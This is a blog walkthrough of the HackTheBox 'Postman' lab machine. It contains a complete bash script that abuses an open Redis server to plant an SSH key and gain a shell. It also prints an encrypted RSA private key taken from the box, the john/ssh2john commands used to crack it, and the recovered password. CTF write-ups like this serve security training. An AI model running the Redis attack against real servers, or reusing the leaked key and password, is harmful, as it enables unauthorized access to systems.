Postman – HackTheBox Machine Walkthrough
Postman machine from HTB places in easy machines category still the method is difficult unless you not using Metasploit directly.
Nmap Scan
In Nmap scanning I found port 22, 80, 6379 -TCP / redis and 10000 -TCP is open. You need to scan all ports otherwise port 6379 will not display.
Radis Enumeration & Exploit
After Nmap scanning is done we found port 6379 and port 10000 are interesting so after some work, I found on 10000 port there is the Webmin login page. On port 6379 which name is redis, I find on google about radis and I got 1 interesting link-
Redis Enumeration:- https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
Using these commands you can make script or use them directly.
Redis Script
#!/bin/bash rm ~/.ssh/id* ssh-keygen -t rsa (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "n\n") > foo.txt redis-cli -h 10.10.10.160 flushall cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/ redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys" redis-cli -h 10.10.10.160 save ssh -i ~/.ssh/id_rsa redis@10.10.10.160
Source: https://github.com/Tatik07/Hackthebox/blob/master/Redis_exploit.sh
After using that script I can access Redis shell. In-home directory we can see the user name is Matt
Privilege Escalation
After using LinEnum script & searching some directories got ssh RSA key in /opt Directory.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
We need to crack this key so we can use ssh2john.py tool then crack that key using john tool with rockyou.txt
# python3 /usr/share/john/ssh2john.py key.txt > loll
#john --wordlist (rockyou location) ( filename )
The password is computer2008 & the user is Matt.
Webmin Exploit Using Metasploit
There are many exploits of webmin. After using packageup remote exploit got root access.
&
Postman HackTheBox Walkthrough
Reviewed by F1R3_CR4CK3R
on
March 15, 2020
Rating:
Reviewed by F1R3_CR4CK3R
on
March 15, 2020
Rating:
No comments: